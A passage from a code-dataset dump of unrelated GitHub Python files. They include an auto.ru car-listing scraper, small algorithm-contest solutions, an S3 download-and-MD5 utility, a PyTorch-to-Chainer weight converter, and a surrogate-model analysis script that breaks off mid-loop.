\"\"\"Getting pages sources\n\n Args:\n data_list (list): The list of dictionaries with `page_sources` and `pagination_urls` keys.\n\n Returns:\n list: The list of pages' source code.\n \"\"\"\n page_sources = []\n pagination_urls = []\n\n for data in data_list:\n page_sources.append(data['page_sources'])\n\n if 'pagination_urls' in data:\n pagination_urls += data['pagination_urls']\n\n pagination_urls = merge_list_of_lists(pagination_urls)\n page_sources = merge_list_of_lists(page_sources)\n\n if len(pagination_urls) > 0:\n logger.warning(\n f'Всего страниц пагинации для всех базовых страниц: {len(pagination_urls)}')\n options = prepare_listing_page_parsing_options(pagination_urls)\n\n with Pool(processes=processes_count) as pool:\n pagination_page_source = pool.map(get_listing_page_source, options)\n pool.close()\n pool.join()\n\n pagination_page_source = merge_list_of_lists(pagination_page_source)\n page_sources += pagination_page_source\n\n return page_sources\n\n\ndef get_base_pages_data(options):\n \"\"\"Parsing the list of pagination URLs and the base page's source code.\n\n Args:\n options (dict): The options dictionary including `wire_options` key and `region` key.\n\n Returns:\n dict: The dictionary with pagination urls and base page's source code.\n \"\"\"\n\n wire_options = options['wire_options']\n region = options['region']\n years = options['years']\n\n region_alias = AUTO_RU_REGIONS_ALIASES[region]\n\n selenium_driver = SeleniumDriver(cookie_page_url=AUTO_RU_ERROR_PAGE_URL)\n selenium_driver.init_driver(wire_options)\n selenium_driver.set_cookies(AUTO_RU_COOKIES)\n\n output = {\n 'page_sources': [],\n 'pagination_urls': []\n }\n\n for year in years:\n logger.warning(f'Параметры: год – {year}, регион - {region}')\n url = f'https://auto.ru/{region_alias}/cars/{year}-year/used/?{\"&\".join(SEARCH_PARAMS)}'\n logger.warning(\n f'Получаем исходный код для базовой страницы c url {url}...')\n\n base_page_source = selenium_driver.get_page_source(url)\n pages_number = parse_pages_number(base_page_source)\n logger.warning(\n f'Всего страниц пагинации для года {year}: {pages_number}')\n output['page_sources'].append(base_page_source)\n\n # Getting the pagination pages number - start.\n pagination_urls = []\n\n for page_number in range(1, pages_number + 1):\n\n if page_number == 1:\n continue\n\n pagination_urls.append(\n f'{url}&page={str(page_number)}')\n\n if len(pagination_urls) > 0:\n output['pagination_urls'].append(pagination_urls)\n # Getting the pagination pages number - end.\n\n scrapping_sleep()\n\n selenium_driver.quit()\n return output\n\n\ndef get_listing_page_source(options):\n \"\"\"Getting the listing page's source code by the URL.\n\n Args:\n options (dict): The dictionary with `wire_options` and `url` keys.\n\n Returns:\n list: The list of pages' source code.\n \"\"\"\n\n wire_options = options['wire_options']\n urls = options['urls']\n\n selenium_driver = SeleniumDriver(cookie_page_url=AUTO_RU_ERROR_PAGE_URL)\n selenium_driver.init_driver(wire_options)\n selenium_driver.set_cookies(AUTO_RU_COOKIES)\n\n page_sources = []\n\n for url in urls:\n logger.warning(f'Получаем исходный код для страницы с URL {url}')\n page_source = selenium_driver.get_page_source(url)\n page_sources.append(page_source)\n scrapping_sleep()\n\n selenium_driver.quit()\n\n return page_sources\n\n\ndef prepare_listing_page_parsing_options(urls):\n \"\"\"Preparing parsing options\n Args:\n urls (list): The list of listing urls.\n\n Returns:\n list: The list of options.\n \"\"\"\n\n proxy_cycle = cycle(AUTO_RU_SCRAPPER_PROXIES)\n proxy = next(proxy_cycle)\n\n options = []\n urls_list = slice_list(urls, processes_count)\n options_count = min(len(urls_list), processes_count)\n\n for i in range(options_count):\n wire_options = SELENIUM_WIRE_OPTIONS.copy()\n wire_options['proxy'] = {\n 'https': f'https://{proxy}'\n }\n options.append({\n 'wire_options': wire_options,\n 'urls': urls_list[i]\n })\n proxy = next(proxy_cycle)\n\n return options\n\n\ndef prepare_base_page_parsing_options():\n \"\"\"Preparing parsing options\n\n Returns:\n list: The list of options including `wire_options` and `year` keys.\n \"\"\"\n\n current_year = start_time.year\n year = START_YEAR\n proxy_cycle = cycle(AUTO_RU_SCRAPPER_PROXIES)\n proxy = next(proxy_cycle)\n\n years = []\n\n while year <= current_year:\n years.append(year)\n year += 1\n\n years_list = slice_list(years, processes_count)\n\n options = []\n\n options_count = min(len(years_list), processes_count)\n\n for i in range(options_count):\n wire_options = SELENIUM_WIRE_OPTIONS.copy()\n wire_options['proxy'] = {\n 'https': f'https://{proxy}'\n }\n options.append({\n 'wire_options': wire_options,\n 'years': years_list[i]\n })\n proxy = next(proxy_cycle)\n\n return options\n\n\ndef parse_pages_number(page_source):\n \"\"\"Getting the URL's pages number.\n\n Args:\n page_source (string): The page source code.\n\n Returns:\n int: The pages number.\n \"\"\"\n\n soup = BeautifulSoup(page_source, 'html.parser')\n pages = soup.find_all(class_='ListingPagination__page')\n pages_number = 1\n\n if pages is not None:\n last_page = None\n\n for last_page in pages:\n pass\n\n if last_page:\n pages_number = int(last_page.get_text())\n\n return pages_number\n\n\ndef get_offers_data(source_code, region):\n \"\"\"Getting the page offers data\n\n Args:\n source_code (string): The page source code.\n region (string): The current region.\n\n Returns:\n list: The list of offers dictionaries.\n \"\"\"\n\n soup = BeautifulSoup(source_code, 'html.parser')\n offers_data = []\n\n offers_listing = soup.find(class_='ListingCars_outputType_list')\n\n if offers_listing is None:\n return offers_data\n\n offers_elements = offers_listing.find_all(class_='ListingItem')\n\n if len(offers_elements) == 0:\n return offers_data\n\n for offer_element in offers_elements:\n offer_data = {}\n\n try:\n url_element = offer_element.find(\n 'a', class_='ListingItemTitle__link')\n except:\n logger.warning('Отсутствует ссылка для предложения.')\n continue\n\n try:\n href = url_element.get('href')\n except:\n logger.warning('Отсутствует аттрибут href для предложения.')\n continue\n\n href = href.split('?')[0]\n offer_data['url'] = href\n\n title = re.sub(' +', ' ', url_element.get_text())\n offer_data['title'] = title\n\n id_hash_data = get_id_hash_from_url(href)\n offer_id = id_hash_data['id']\n offer_hash = id_hash_data['hash']\n\n if offer_id is None or hash is None:\n logger.warning(\n f'Для предложения с url {href} отсутствуют id или hash.')\n continue\n\n offer_data['id'] = offer_id\n offer_data['hash'] = offer_hash\n\n price_element = offer_element.find(class_='ListingItem__price')\n\n if price_element is not None:\n price = price_element.get_text()\n price = string_to_number(price)\n offer_data['price'] = price\n\n release_year_element = offer_element.find(class_='ListingItem__year')\n\n if release_year_element is not None:\n release_year = release_year_element.get_text()\n release_year = string_to_number(release_year)\n offer_data['release_year'] = release_year\n\n run_element = offer_element.find(class_='ListingItem__kmAge')\n\n if run_element is not None:\n run = run_element.get_text()\n run = string_to_number(run)\n offer_data['run'] = run\n\n offer_data['createdon'] = datetime.datetime.now()\n offer_data['region'] = region\n offer_data['source'] = SCRAPPING_SOURCES['AUTO_RU']\n\n offers_data.append(offer_data)\n\n return offers_data\n\n\ndef filter_existing_offers(data):\n \"\"\"Filtering the existing in the database offers.\n\n Args:\n data (list): The list of offers' data.\n\n Returns:\n list: The filtered list of offers' data.\n \"\"\"\n\n sql = '''\n SELECT\n url\n FROM\n offers_list\n ;'''\n\n connection = db_connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n existing_offers = cursor.fetchall()\n\n logger.warning(\n f'Количество предложений в базе: {len(existing_offers)}')\n\n cursor.close()\n connection.close()\n\n existing_urls = [i[0] for i in existing_offers]\n urls_to_remove = []\n\n for parsed_offer in data:\n offer_url = parsed_offer['url']\n\n if offer_url in existing_urls:\n urls_to_remove.append(offer_url)\n\n data = list(filter(lambda x: x['url'] not in urls_to_remove, data))\n\n logger.warning(\n f'Количество предложений для добавления в базу: {len(data)}')\n\n return data\n\n\ndef add_offers_to_db(data):\n \"\"\"Adding offers to the database.\n\n Args:\n data (list): The list of offers' data.\n \"\"\"\n\n connection = db_connect()\n cursor = connection.cursor()\n added_offers_number = 0\n\n for offer_data in data:\n offer_id = offer_data['id']\n offer_hash = offer_data['hash']\n url = offer_data['url']\n title = offer_data['title']\n\n if 'price' in offer_data:\n price = offer_data['price']\n else:\n price = 0\n\n release_year = offer_data['release_year']\n run = offer_data['run']\n createdon = offer_data['createdon']\n region = offer_data['region']\n source = offer_data['source']\n\n try:\n cursor.execute(\n '''\n INSERT INTO\n offers_list (offer_id, hash, url, title, price,\n release_year, run, createdon, region, source)\n VALUES\n (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\n ''',\n (\n offer_id,\n offer_hash,\n url,\n title,\n price,\n release_year,\n run,\n createdon,\n region,\n source\n )\n )\n connection.commit()\n logger.warning(f'Добавлено предложение с URL {url}')\n added_offers_number += 1\n except Exception as e:\n logger.warning(\n f'Не удалось добавить в базу предложение в url: {url}. Текст ошибки: {str(e)}')\n\n cursor.close()\n connection.close()\n\n if added_offers_number > 0:\n logger.warning(\n f'Добавлено новых предложений в базу: {added_offers_number} шт.')\n\n\ndef get_id_hash_from_url(url):\n \"\"\"Getting `id` and `hash` values from the url.\n\n Args:\n url (string): The offer's URL.\n\n Returns:\n dict: The dictionary with id and hash.\n \"\"\"\n\n url_list = url.split('/')\n url_list = list(filter(None, url_list))\n id_hash = url_list[-1].split('-')\n\n return {\n 'id': id_hash[0],\n 'hash': id_hash[1]\n }\n\n\nif __name__ == '__main__':\n scrape_offers()\n","repo_name":"Sapfik/Practise-Python","sub_path":"autostatistic_parser-main/auto_ru/offers_scrapper.py","file_name":"offers_scrapper.py","file_ext":"py","file_size_in_byte":14419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18903180086","text":"import heapq\n\ndef solution(food_times, k):\n # k가 크거나 같다면 -1\n if sum(food_times) <= k:\n return -1\n\n # 시간이 작은 음식부터 빼야 하므로 우선순위 큐를 이용\n q = []\n for i in range(len(food_times)):\n heapq.heappush(q, (food_times[i], i+1))\n # (음식 시간, 음식 번호) 형태로 우선순위 큐에 삽입\n \n sum_value = 0 # 먹기 위해 사용한 시간\n previous = 0 # 직전에 다 먹은 음식의 시간\n length = len(food_times) # 남아있는 음식의 개수\n\n # (sum_valse + (현재의 음식 시간 - 이전 음식 시간) * 현재 음식 개수)와 k 비교\n while sum_value + ((q[0][0] - previous) * length) <= k:\n # 다음 음식을 모두 먹어도 시간을 초과하지 않는지 확인하는 조건문\n # 조건문을 통과했다면 해당 음식을 먹어서 없애는 동작을 수행\n now = heapq.heappop(q)[0] # 먹어서 없앨 음식\n sum_value += (now - previous) * length # 음식을 먹었으니 먹는데 걸린 시간만큼 처리\n length -= 1 # 다 먹은 음식 제외\n previous = now # 이전 음식 시간 재설정\n\n result = sorted(q, key = lambda x: x[1])\n # 인덱스 1의 값은 음식의 번호이다.\n # 남아있는 음식들을 음식의 번호대로 정렬한다.\n return result[(k - sum_value) % length][1]\n # k - sum_value : 음식들이 없어지고 남아있는 시간\n # length : 남아있는 음식들의 개수\n\nprint(solution([3,1,2],5))\n#print(solution([4,2,9,2,8], 17))\n#print(solution([946,314,757,322,559,648,932,234,543],3021))\n\n'''\n시간이 작은 음식을 없애가며 진행해간다.\n\n음식을 없애기 전에 없애는 데에 시간이 얼마나 소요되고\n그 시간이 제한 시간 k를 넘기는지 비교한다.\n\n넘기지 않는다면 음식을 없애고\n\n넘긴다면 음식을 없애는 과정을 멈추고\n없어지지 않고 남아있는 음식중에서\n제한시간에서 소요된 시간을 제외하여 남아있는 시간을 구한다.\n남아있는 시간이 지나면 어떤 음식이 나올지 구한다.\n남아있는 시간이 지나는 동안은 음식이 없어지지 않으므로 쉽게 구할 수 있다.\n'''","repo_name":"LeeWoojin-99/Algorithm","sub_path":"316Page_answer.py","file_name":"316Page_answer.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42102428726","text":"# expt.command: step11_reduced\n\n# django\nfrom django.core.management.base import BaseCommand, CommandError\n\n# local\nfrom apps.expt.models import Series\n\n# util\nimport os\nimport numpy as np\nfrom optparse import make_option\nimport matplotlib.pyplot as plt\n\n### Command\nclass Command(BaseCommand):\n option_list = BaseCommand.option_list + (\n\n make_option('--expt', # option that will appear in cmd\n action='store', # no idea\n dest='expt', # refer to this in options variable\n default='050714', # some default\n help='Name of the experiment to import' # who cares\n ),\n\n make_option('--series', # option that will appear in cmd\n action='store', # no idea\n dest='series', # refer to this in options variable\n default='13', # some default\n help='Name of the series' # who cares\n ),\n\n )\n\n args = ''\n help = ''\n\n def handle(self, *args, **options):\n '''\n 1. What does this script do?\n > Use masks to build up larger masks surrounding markers\n\n 2. What data structures are input?\n > Mask, Gon\n\n 3. What data structures are output?\n > Channel, Gon, Mask\n\n 4. Is this stage repeated/one-time?\n > Repeated\n\n Steps:\n\n 1. load mask gons\n 2. stack vertically in single array\n\n '''\n\n series = Series.objects.get(experiment__name=options['expt'], name=options['series'])\n\n for cell_instance in series.cell_instances.all():\n plt.scatter(cell_instance.t, cell_instance.V(), color=['blue','red','green','yellow'][cell_instance.region.index-1])\n\n plt.show()\n","repo_name":"NicholasPiano/puzzle","sub_path":"woot/apps/expt/management/commands/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71821370721","text":"import sys\ninput = sys.stdin.readline\nimport heapq\n\n\nn,m,r = map(int,input().split())\nt = [0]+list(map(int,input().split()))\nINF = int(1e9)\narr = [[INF] * (n+1) for _ in range(n+1)]\n\nfor _ in range(r):\n\ta,b,c = map(int,input().split())\n\tarr[a][b] = c\n\tarr[b][a] = c\n\nfor i in range(n+1):\n\tarr[i][i] = 0\n\n\nfor k in range(1,n+1):\n\tfor i in range(1,n+1):\n\t\tfor j in range(1,n+1):\n\t\t\tarr[i][j] = min(arr[i][k]+ arr[k][j],arr[i][j])\n\nans = 0\n\nfor i in range(1,n+1):\n\ttmp = 0\n\tfor j in range(1,n+1):\n\t\tif arr[i][j] <= m:\n\t\t\ttmp += t[j]\n\tans = max(ans,tmp)\nprint(ans)\n\n\n","repo_name":"maantano/Coding-Test","sub_path":"파이썬/2023.11.09 서강 그라운드(14938)_최단거리_플로이드워셜.py","file_name":"2023.11.09 서강 그라운드(14938)_최단거리_플로이드워셜.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40245139877","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport sys\nimport os\nimport subprocess\nimport time\nimport argparse\nimport hashlib\n\nBATCH_SIZE = 5 # download files this many at a time\ns3_prefix = \"s3://\"\n\ndef getmd5(file_path):\n \n file_name = os.path.basename(file_path)\n \n print(\"md5 \", file_path)\n \n hash = hashlib.md5()\n with open(file_path, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash.update(chunk)\n \n print(file_name, hash.hexdigest())\n\n \ndef dobatch(filelist, **kwargs):\n downloads = [] # handles to sub-processes\n s3_cache_dir = os.environ[\"S3_CACHE_DIR\"]\n downloaded_files = []\n for filename in filelist:\n if filename.startswith(s3_prefix):\n if s3_cache_dir is None:\n raise IOError(\"Environment variable S3_CACHE_DIR not set\")\n s3_path = filename[len(s3_prefix):]\n s3_uri = filename\n local_filepath = os.path.join(s3_cache_dir, s3_path)\n \n if os.path.exists(local_filepath):\n # todo, check that the s3 object is the same as local copy\n pass\n else:\n p = subprocess.Popen(['s3cmd', 'get', s3_uri, local_filepath])\n downloads.append(p)\n downloaded_files.append(local_filepath)\n else:\n downloaded_files.append(filename)\n \n if len(downloads) > 0:\n done = False\n while not done:\n print('.')\n time.sleep(1)\n done = True\n for p in downloads:\n p.poll()\n if p.returncode is None:\n done = False # still waiting on a download\n elif p.returncode < 0:\n raise IOError(\"s3cmd failed for \" + filename)\n else:\n pass # success!\n print(\"downloads complete\")\n for filename in downloaded_files:\n getmd5(filename) \n \n \n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', \"--filename\", help=\"name of file or s3 uri\")\n parser.add_argument('-i', \"--input\", help=\"text file of files or s3 uri\")\n parser.add_argument('-c', \"--cluster\", help=\"cluster profile\")\n # example file:\n # public AWS -\n # s3://hdfgroup/data/hdf5test/GSSTF_NCEP.3.2000.05.01.he5\n # OSDC Ceph -\n # s3://hdfdata/ncep3/GSSTF_NCEP.3.2000.05.01.he5\n\n # example path (for above file):\n # /HDFEOS/GRIDS/NCEP/Data\\ Fields/Psea_level\n \n\n args = parser.parse_args()\n\n if not args.filename and not args.input:\n sys.exit(\"No filename specified!\")\n\n files = []\n if args.input:\n with open(args.input) as f:\n for line in f:\n line = line.strip()\n if not line or line[0] == '#':\n continue\n files.append(line) \n else:\n files.append(args.filename)\n \n \n batch = [] \n for filename in files:\n batch.append(filename)\n if len(batch) == BATCH_SIZE:\n dobatch(batch)\n batch = []\n \n dobatch(batch) # catch any trailers\n\n\nmain()\n","repo_name":"HDFGroup/datacontainer","sub_path":"filters/getmd5.py","file_name":"getmd5.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"21433934848","text":"#!/usr/bin/env python\n\nimport os.path as osp\nimport sys\n\nimport chainer\nimport chainer.links as L\nfrom chainer_cyclegan.links import InstanceNormalization\nimport numpy as np\nimport torch\n\ntorch.backends.cudnn.benchmark = True\n\nimport cv2 # NOQA\n\nhere = osp.dirname(osp.abspath(__file__))\npytorch_dir = osp.realpath(osp.join(here, '../../src/pytorch-bicyclegan'))\nsys.path.insert(0, pytorch_dir)\n\nfrom models.networks import E_ResNet\nfrom models.networks import get_non_linearity\nfrom models.networks import get_norm_layer\n\nimport chainer_bicyclegan\n\n\ndef convert_E(nz, output_nc):\n E_model_file = osp.join(here, 'data/edges2shoes_net_E.pth')\n E = E_ResNet(\n input_nc=output_nc,\n output_nc=nz,\n ndf=64,\n n_blocks=5,\n norm_layer=get_norm_layer('instance'),\n nl_layer=get_non_linearity('lrelu'),\n gpu_ids=[],\n vaeLike=True,\n )\n E.load_state_dict(torch.load(E_model_file))\n\n E_chainer = chainer_bicyclegan.models.E_ResNet(\n input_nc=output_nc,\n output_nc=nz,\n ndf=64,\n n_blocks=5,\n norm_layer='instance',\n nl_layer='lrelu',\n vaeLike=True,\n )\n\n def copyto(l2_list, l1_list):\n assert len(l2_list) == len(l1_list)\n for l1, l2 in zip(l1_list, l2_list):\n if isinstance(l2, (L.Convolution2D, L.Deconvolution2D, L.Linear)):\n np.copyto(l2.W.array, l1.weight.data.numpy())\n np.copyto(l2.b.array, l1.bias.data.numpy())\n elif isinstance(l2, InstanceNormalization):\n np.copyto(l2.avg_mean, l1.running_mean.numpy())\n np.copyto(l2.avg_var, l1.running_var.numpy())\n elif isinstance(l2, chainer_bicyclegan.models.BasicBlock):\n l2_list = l2.conv.functions\n l1_list = l1.conv\n copyto(l2_list, l1_list)\n l2_list = l2.shortcut.functions\n l1_list = l1.shortcut\n copyto(l2_list, l1_list)\n elif isinstance(l2, chainer_bicyclegan.models.Sequential):\n l2_list = l2.functions\n l1_list = l1\n copyto(l2_list, l1_list)\n else:\n print('Skip: {} -> {}'.format(type(l1), type(l2)))\n continue\n print('Copy: {} -> {}'.format(type(l1), type(l2)))\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.fc)\n l1_list = E.fc\n l2_list = E_chainer.fc.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.fcVar)\n l1_list = E.fcVar\n l2_list = E_chainer.fcVar.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print(E.conv)\n l1_list = E.conv\n l2_list = E_chainer.conv.functions\n copyto(l2_list, l1_list)\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n out_file = osp.join(here, 'data/edges2shoes_net_E_from_chainer.npz')\n chainer.serializers.save_npz(out_file, E_chainer)\n\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n params = []\n for param in E.parameters():\n params.append(param.data.numpy().flatten())\n params = np.hstack(params)\n print(params.min(), params.mean(), params.max())\n print('==========================================================')\n params = []\n for param in E_chainer.params():\n params.append(param.array.flatten())\n params = np.hstack(params)\n print(params.min(), params.mean(), params.max())\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<')\n\n\ndef main():\n nz = 8\n output_nc = 3\n convert_E(nz, output_nc)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wkentaro/chainer-bicyclegan","sub_path":"examples/pytorch2chainer/pytorch2chainer_E.py","file_name":"pytorch2chainer_E.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"73959481761","text":"import sys\nsys.path.append(\"./c3d8\")\nsys.path.append(\"./mesh\")\n#%%\nimport torch\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom analyze_surrogate_shape_x_c_functions import get_data_frame, get_result #, get_table\n#%%\npd.set_option(\"display.max_columns\", None)\npd.set_option('display.max_colwidth', None)\npd.set_option('display.width', 1000)\n#%%\nfolder_data='./data/343c1.5_fast/'\nfolder_result=\"./result/forward/\"\nstress='VM'\nloss1_threshold='R1'\n#%%\nBest_list=[\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n 'TransEncoder4(2,256,2,16)_TransDecoder4()_float32',\n \"UNet(512)_TransDecoder4()_float32\",\n \"MeshGraphNet(3,8,5,128,3,0.1)_float32\",\n \"Linear_encoder(30000,3,0.1)_MLP1b(3,512,4,30000)_float32\",\n ]\nbest_result_val=[]\nbest_result_test=[]\nbest_result_test_r=[]\nmrse_train=[]\nmrse_val=[]\nfor name in Best_list:\n try:\n folder_net=folder_result+name+\"/0.5/matMean/\"+name+\".pt\"\n data=torch.load(folder_net, map_location='cpu')\n except:\n folder_net=folder_result+name+\"/0.5/matMean/\"+name.replace('_float32', '')+\".pt\"\n data=torch.load(folder_net, map_location='cpu')\n print(name)\n #print(data['arg'])\n\n mrse_train.append(data['mrse_train'])\n mrse_val.append(data['mrse_val'])\n\n result_val=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='val', stress=stress, refine=False)\n result_test=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='test', stress=stress, refine=False)\n result_test_r=get_data_frame(name, name.replace('_float32', ''), folder_data, folder_result,\n test_or_val='test', stress=stress, refine=True)\n best_result_val.append(result_val)\n best_result_test.append(result_test)\n best_result_test_r.append(result_test_r)\nbest_result_val=pd.concat(best_result_val)\nbest_result_test=pd.concat(best_result_test)\nbest_result_test_r=pd.concat(best_result_test_r)\n#%%\nidx_best=np.argmin(best_result_val['MRSE_avg'].values)\nprint(\"best val\", best_result_val.iloc[idx_best])\nprint(\"best test\", best_result_test.iloc[idx_best])\nprint(\"best test_r\", best_result_test_r.iloc[idx_best])\n#%%\nbest_result_test.to_csv(folder_result+\"NN_result_test.csv\")\nbest_result_test_r.to_csv(folder_result+\"NN_result_test_R.csv\")\n#%%\nfig, ax = plt.subplots(2,2,constrained_layout=True, sharex=True, sharey=True)\nax[0,0].plot(np.array(mrse_val[0])[:,0], color='r', label='W-Net'); ax[0,0].set_ylim(0, 1)\n#ax[0,0].plot(np.array(mrse_val[0])[:,0], color='m')\nax[0,1].plot(np.array(mrse_val[1])[:,0], color='g', label='TransNet'); ax[0,1].set_ylim(0, 1)\nax[1,0].plot(np.array(mrse_val[2])[:,0], color='b', label='U-Net'); ax[1,0].set_ylim(0, 1)\nax[1,1].plot(np.array(mrse_val[3])[:,0], color='c', label='MeshGraphNet'); ax[1,1].set_ylim(0, 1)\nax[0,0].legend(loc='center')\nax[0,1].legend(loc='center')\nax[1,0].legend(loc='center')\nax[1,1].legend(loc='center')\n#%%\nfor k in range(0, 4):\n mrse_train_k=np.array(mrse_train[k])[:,0]\n print(abs(mrse_train_k[-1]-mrse_train_k[-2]))\nfor k in range(0, 4):\n mrse_val_k=np.array(mrse_val[k])[:,0]\n print(abs(mrse_val_k[-1]-mrse_val_k[-2]))\n#%%\nresult=get_result(\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n folder_data, folder_result, train_percent=0.5, test_or_val='test', stress='VM', refine=False)\nmrse_mean, mrse_max, MAPE_list, APE_list, time_cost, filelist_true, filelist_pred = result\n#%%\nimport numpy as np\nprint(np.sum(MAPE_list>0.1)/len(MAPE_list))\nprint(np.sum(APE_list>0.1)/len(APE_list))\n\nprint(np.sum(MAPE_list>0.05)/len(MAPE_list))\nprint(np.sum(APE_list>0.05)/len(APE_list))\n\n#%%\nfrom PolyhedronMesh import PolyhedronMesh\nfrom train_val_test_split_x_c_new1 import train_val_test_split\n\n(filelist_train, filelist_val, filelist_test,\n shape_idlist_train, shape_idlist_val, shape_idlist_test)=train_val_test_split(folder_data, 0.5)\n#%%\ndef load_mesh(filename_px, folder):\n mesh_px=PolyhedronMesh()\n mesh_px.load_from_torch(filename_px)\n mesh_p0=PolyhedronMesh()\n filename_p0=filename_px.replace('i90', 'i0')\n mesh_p0.load_from_torch(filename_p0)\n X=mesh_p0.node\n x=mesh_px.node\n return X, x\n#%%\ndef load_all(filelist, folder):\n X_all=[]; x_all=[]\n for filename_px in filelist:\n try:\n X, x=load_mesh(filename_px, folder)\n X_all.append(X)\n x_all.append(x)\n except:\n print(\"cannot load\", filename_px)\n return X_all, x_all\n#%%\nX_train, x_train=load_all(filelist_train, folder_data)\nX_val, x_val=load_all(filelist_val, folder_data)\nX_test, x_test=load_all(filelist_test, folder_data)\n#%%\nfrom sklearn.decomposition import PCA\ndata_train=[]\nfor X in X_train:\n data_train.append(X.view(1, -1).cpu())\ndata_train=torch.cat(data_train, dim=0)\ndata_train=data_train.numpy()\npca=PCA(n_components=10)\npca.fit(data_train)\n#%%\ndata_test=[]\nfor x in x_test:\n data_test.append(x.view(1, -1).cpu())\ndata_test=torch.cat(data_test, dim=0)\ndata_test=data_test.numpy()\ndata_test_rec=pca.inverse_transform(pca.transform(data_test))\n#%%\ndata_test=data_test.reshape(-1,10000,3)\ndata_test_rec=data_test_rec.reshape(-1,10000,3)\nrec_error_test=np.sqrt(((data_test_rec-data_test)**2).sum(axis=2)).mean(axis=1)\n#%%\nfrom sklearn.metrics import roc_auc_score\nBest_list=[\"Encoder3('BaseNet0',3,128,2,1,1,1,3)_Net1('BaseNet5b',3,3,512,4,1,1,1,3,'softplus')_float32\",\n 'TransEncoder4(2,256,2,16)_TransDecoder4()_float32',\n \"UNet(512)_TransDecoder4()_float32\",\n \"MeshGraphNet(3,8,5,128,3,0.1)_float32\",\n \"Linear_encoder(30000,3,0.1)_MLP1b(3,512,4,30000)_float32\",\n ]\nauc_list_rec10=[]\nauc_list_rec05=[]\nauc_list_rec01=[]\nfor name in Best_list:\n\n result_test=get_result(name, folder_data, folder_result, 0.5,\n test_or_val='test', stress=stress, refine=False)\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, rec_error_test)\n auc05 = roc_auc_score(result_test[3]>0.05, rec_error_test)\n auc01 = roc_auc_score(result_test[3]>0.01, rec_error_test)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_rec10.append(auc10)\n auc_list_rec05.append(auc05)\n auc_list_rec01.append(auc01)\n fig, ax = plt.subplots()\n #ax.hist(result_test[3], bins=100)\n ax.plot(rec_error_test, result_test[3], '.')\n #ax.set_ylim(0,1)\n ax.set_title(name)\n ax.set_xlabel(str(auc10)+' '+str(auc05)+' '+str(auc01))\n#%%\nfrom AortaFEModel_C3D8_SRI import AortaFEModel\nfrom Mat_GOH_SRI import cal_1pk_stress, cal_cauchy_stress\nfrom aorta_mesh import get_solid_mesh_cfg\ndevice=torch.device(\"cuda:0\")\ndtype=torch.float64\n#%%\nfilename_shell='./data/bav17_AortaModel_P0_best.pt'\n(boundary0, boundary1, Element_surface_pressure, Element_surface_free)=get_solid_mesh_cfg(filename_shell)\nMat=torch.load('./data/125mat.pt')['mean_mat_str']\nMat=[float(m) for m in Mat.split(\",\")]\nMat[4]=np.pi*(Mat[4]/180)\nMat=torch.tensor([Mat], dtype=dtype, device=device)\n#%%\nauc_list_Rmean10=[]\nauc_list_Rmean05=[]\nauc_list_Rmean01=[]\nauc_list_Rmax10=[]\nauc_list_Rmax05=[]\nauc_list_Rmax01=[]\nauc_list_loss10=[]\nauc_list_loss05=[]\nauc_list_loss01=[]\nfor name in Best_list:\n result_test=get_result(name, folder_data, folder_result, 0.5,\n test_or_val='test', stress=stress, refine=False)\n filelist_test_pred=result_test[-1]\n loss1_list=[]\n Rmean_list=[]\n Rmax_list=[]\n for k in range(0, len(filelist_test)):\n mesh_p0=filelist_test[k].replace(\"i90\", \"i0\")\n mesh_px=filelist_test_pred[k]\n pressure=18\n\n Mesh_X=PolyhedronMesh()\n Mesh_X.load_from_torch(mesh_p0)\n Node_X=Mesh_X.node.to(dtype).to(device)\n Element=Mesh_X.element.to(device)\n\n Mesh_x=PolyhedronMesh()\n Mesh_x.load_from_torch(mesh_px)\n 